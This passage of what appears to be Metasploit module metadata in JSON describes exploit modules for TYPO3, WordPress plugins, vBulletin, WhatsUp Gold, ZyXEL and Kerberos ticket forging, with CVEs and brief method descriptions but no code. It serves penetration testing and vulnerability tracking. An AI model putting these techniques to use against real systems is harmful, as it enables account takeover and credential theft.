sa-2010-020 Remote File Disclosure", - "fullname": "auxiliary/admin/http/typo3_sa_2010_020", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley", - "Gregor Kopf" - ], - "description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.", - "references": [ - "CVE-2010-3714", - "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020", - "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_sa_2010_020", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/typo3_winstaller_default_enc_keys": { - "name": "TYPO3 Winstaller Default Encryption Keys", - "fullname": "auxiliary/admin/http/typo3_winstaller_default_enc_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).", - "references": [ - "URL-http://typo3winstaller.sourceforge.net/" - ], - "platform": "", - "arch": "", - "rport": 8503, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", - "is_install_path": true, - "ref_name": "admin/http/typo3_winstaller_default_enc_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "HMAC_SHA1", - "description": "TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)" - }, - { - "name": "MIME", - "description": "TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 4.4.1 - 4.4.3" - }, - { - "name": "Short_MD5", - "description": "TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0" - } - ] - }, - "auxiliary_admin/http/ulterius_file_download": { - "name": "Ulterius Server File Download Vulnerability", - "fullname": "auxiliary/admin/http/ulterius_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rick Osgood", - "Jacob Robles" - ], - "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.", - "references": [ - "EDB-43141", - "CVE-2017-16806" - ], - "platform": "", - "arch": "", - "rport": 22006, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/ulterius_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/vbulletin_upgrade_admin": { - "name": "vBulletin Administrator Account Creation", - "fullname": "auxiliary/admin/http/vbulletin_upgrade_admin", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-09", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.", - "references": [ - "CVE-2013-6129", - "URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html", - "OSVDB-98370", - "URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", - "is_install_path": true, - "ref_name": "admin/http/vbulletin_upgrade_admin", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/webnms_cred_disclosure": { - "name": "WebNMS Framework Server Credential Disclosure", - "fullname": "auxiliary/admin/http/webnms_cred_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-07-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n all user credentials. The first vulnerability is an unauthenticated file download\n in the FetchFile servlet, which is used to download the file containing the user\n credentials. The second vulnerability is that the passwords in the file are\n obfuscated with a very weak algorithm which can be easily reversed.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", - "references": [ - "CVE-2016-6601", - "CVE-2016-6602", - "URL-https://blogs.securiteam.com/index.php/archives/2712", - "URL-https://seclists.org/fulldisclosure/2016/Aug/54" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", - "is_install_path": true, - "ref_name": "admin/http/webnms_cred_disclosure", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/webnms_file_download": { - "name": "WebNMS Framework Server Arbitrary Text File Download", - "fullname": "auxiliary/admin/http/webnms_file_download", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-07-04", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n unauthenticated user to download files off the file system by using a directory\n traversal attack on the FetchFile servlet.\n Note that only text files can be downloaded properly, as any binary file will get\n mangled by the servlet. Also note that for Windows targets you can only download\n files that are in the same drive as the WebNMS installation.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", - "references": [ - "CVE-2016-6601", - "URL-https://blogs.securiteam.com/index.php/archives/2712", - "URL-https://seclists.org/fulldisclosure/2016/Aug/54" - ], - "platform": "", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", - "is_install_path": true, - "ref_name": "admin/http/webnms_file_download", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/whatsup_gold_sqli": { - "name": "WhatsUp Gold SQL Injection (CVE-2024-6670)", - "fullname": "auxiliary/admin/http/whatsup_gold_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-08-29", - "type": "auxiliary", - "author": [ - "Michael Heinzl", - "Sina Kheirkhah ( " - ], - "description": "This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)\n to an attacker-controlled one.\n\n WhatsUp Gold versions < v24.0.0 are affected.", - "references": [ - "CVE-2024-6670", - "URL-https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024", - "URL-https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-1185/" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-09-26 04:01:36 +0000", - "path": "/modules/auxiliary/admin/http/whatsup_gold_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/whatsup_gold_sqli", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_automatic_plugin_privesc": { - "name": "WordPress Plugin Automatic Config Change to RCE", - "fullname": "auxiliary/admin/http/wp_automatic_plugin_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-09-06", - "type": "auxiliary", - "author": [ - "h00die", - "Jerome Bruandet" - ], - "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).", - "references": [ - "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-03 19:50:04 +0000", - "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_automatic_plugin_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "NOCVE": [ - "Patched in 3.53.3 without vendor disclosure" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_custom_contact_forms": { - "name": "WordPress custom-contact-forms Plugin SQL Upload", - "fullname": "auxiliary/admin/http/wp_custom_contact_forms", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-08-07", - "type": "auxiliary", - "author": [ - "Marc-Alexandre Montpas", - "Christian Mehlmauer " - ], - "description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.", - "references": [ - "URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html", - "URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=", - "WPVDB-7542" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_custom_contact_forms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_easycart_privilege_escalation": { - "name": "WordPress WP EasyCart Plugin Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_easycart_privilege_escalation", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-25", - "type": "auxiliary", - "author": [ - "rastating" - ], - "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", - "references": [ - "CVE-2015-2673", - "WPVDB-7808", - "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_easycart_privilege_escalation", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_gdpr_compliance_privesc": { - "name": "WordPress WP GDPR Compliance Plugin Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_gdpr_compliance_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-11-08", - "type": "auxiliary", - "author": [ - "Mikey Veenstra (WordFence)", - "Thomas Labadie" - ], - "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.", - "references": [ - "URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/", - "CVE-2018-19207", - "WPVDB-9144" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_gdpr_compliance_privesc", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_google_maps_sqli": { - "name": "WordPress Google Maps Plugin SQL Injection", - "fullname": "auxiliary/admin/http/wp_google_maps_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-04-02", - "type": "auxiliary", - "author": [ - "Thomas Chauchefoin (Synacktiv)" - ], - "description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.", - "references": [ - "CVE-2019-10692", - "WPVDB-9249" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_google_maps_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_masterstudy_privesc": { - "name": "Wordpress MasterStudy Admin Account Creation", - "fullname": "auxiliary/admin/http/wp_masterstudy_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-02-18", - "type": "auxiliary", - "author": [ - "h00die", - "Numan Türle" - ], - "description": "MasterStudy LMS, a WordPress plugin,\n prior to 2.7.6 is affected by a privilege escalation where an unauthenticated\n user is able to create an administrator account for wordpress itself.", - "references": [ - "CVE-2022-0441", - "URL-https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6", - "EDB-50752", - "WPVDB-173c2efe-ee9c-4539-852f-c242b4f728ed" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-13 10:13:27 +0000", - "path": "/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_masterstudy_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_post_smtp_acct_takeover": { - "name": "Wordpress POST SMTP Account Takeover", - "fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-01-10", - "type": "auxiliary", - "author": [ - "h00die", - "Ulysses Saicha" - ], - "description": "The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege\n escalation where an unauthenticated user is able to reset the password\n of an arbitrary user. This is done by requesting a password reset, then\n viewing the latest email logs to find the associated password reset email.", - "references": [ - "CVE-2023-6875", - "URL-https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-11-28 13:18:47 +0000", - "path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_post_smtp_acct_takeover", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_symposium_sql_injection": { - "name": "WordPress Symposium Plugin SQL Injection", - "fullname": "auxiliary/admin/http/wp_symposium_sql_injection", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-08-18", - "type": "auxiliary", - "author": [ - "PizzaHatHacker", - "Matteo Cantoni " - ], - "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.", - "references": [ - "CVE-2015-6522", - "EDB-37824" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_symposium_sql_injection", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_wplms_privilege_escalation": { - "name": "WordPress WPLMS Theme Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_wplms_privilege_escalation", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-09", - "type": "auxiliary", - "author": [ - "Evex", - "rastating" - ], - "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", - "references": [ - "WPVDB-7785" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_wplms_privilege_escalation", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/zyxel_admin_password_extractor": { - "name": "ZyXEL GS1510-16 Password Extractor", - "fullname": "auxiliary/admin/http/zyxel_admin_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Daniel Manser", - "Sven Vetsch" - ], - "description": "This module exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/pull/2709" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/zyxel_admin_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/kerberos/forge_ticket": { - "name": "Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging", - "fullname": "auxiliary/admin/kerberos/forge_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Benjamin Delpy", - "Dean Welch", - "alanfoster", - "smashery" - ], - "description": "This module forges a Kerberos ticket. Four different techniques can be used:\n - Silver ticket: Using a service account hash, craft a ticket impersonating any user and privileges to that account.\n - Golden ticket: Using the krbtgt hash, craft a ticket impersonating any user and privileges.\n - Diamond ticket: Authenticate to the domain controller, and using the krbtgt hash, copy the PAC from the authenticated user to a forged ticket.\n - Sapphire ticket: Use the S4U2Self+U2U trick to retrieve the PAC of another user, then use the krbtgt hash to craft a forged ticket.", - "references": [ - "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it" - ], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-11-28 13:14:13 +0000", - "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/forge_ticket", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "AKA": [ - "Ticketer", - "Klist" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "FORGE_DIAMOND", - "description": "Forge a Diamond Ticket" - }, - { - "name": "FORGE_GOLDEN", - "description": "Forge a Golden Ticket" - }, - { - "name": "FORGE_SAPPHIRE", - "description": "Forge a Sapphire Ticket" - }, - { - "name": "FORGE_SILVER", - "description": "Forge a Silver Ticket" - } - ] - }, - "auxiliary_admin/kerberos/get_ticket": { - "name": "Kerberos TGT/TGS Ticket Requester", - "fullname": "auxiliary/admin/kerberos/get_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Christophe De La Fuente", - "Spencer McIntyre", - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "smashery" - ], - "description": "This module requests TGT/TGS Kerberos tickets from the KDC", - "references": [], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-01-29 14:25:33 +0000", - "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/get_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "getTGT", - "getST" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "GET_HASH", - "description": "Request a TGS to recover the NTLM hash" - }, - { - "name": "GET_TGS", - "description": "Request a Ticket-Granting-Service (TGS)" - }, - { - "name": "GET_TGT", - "description": "Request a Ticket-Granting-Ticket (TGT)" - } - ] - }, - "auxiliary_admin/kerberos/inspect_ticket": { - "name": "Kerberos Ticket Inspecting", - "fullname": "auxiliary/admin/kerberos/inspect_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Dean Welch" - ], - "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-01-26 09:21:55 +0000", - "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/inspect_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [], - "AKA": [ - "klist" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/kerberos/keytab": { - "name": "Kerberos keytab utilities", - "fullname": "auxiliary/admin/kerberos/keytab", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "alanfoster" - ], - "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-06-13 09:14:06 +0000", - "path": "/modules/auxiliary/admin/kerberos/keytab.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/keytab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a new entry to the keytab file" - }, - { - "name": "EXPORT", - "description": "Export the current database creds to the keytab file" - }, - { - "name": "LIST", - "description": "List the entries in the keytab file" - } - ] - }, - "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": { - "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability", - "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-18", - "type": "auxiliary", - "author": [ - "Tom Maddock", - "Sylvain Monne", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.", - "references": [ - "CVE-2014-6324", - "MSB-MS14-068", - "OSVDB-114751", - "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx", - "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/", - "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek", - "URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit" - ], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/ms14_068_kerberos_checksum", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/kerberos/ticket_converter": { - "name": "Kerberos ticket converter", - "fullname": "auxiliary/admin/kerberos/ticket_converter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Zer1t0", - "Dean Welch" - ], - "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.", - "references": [ - 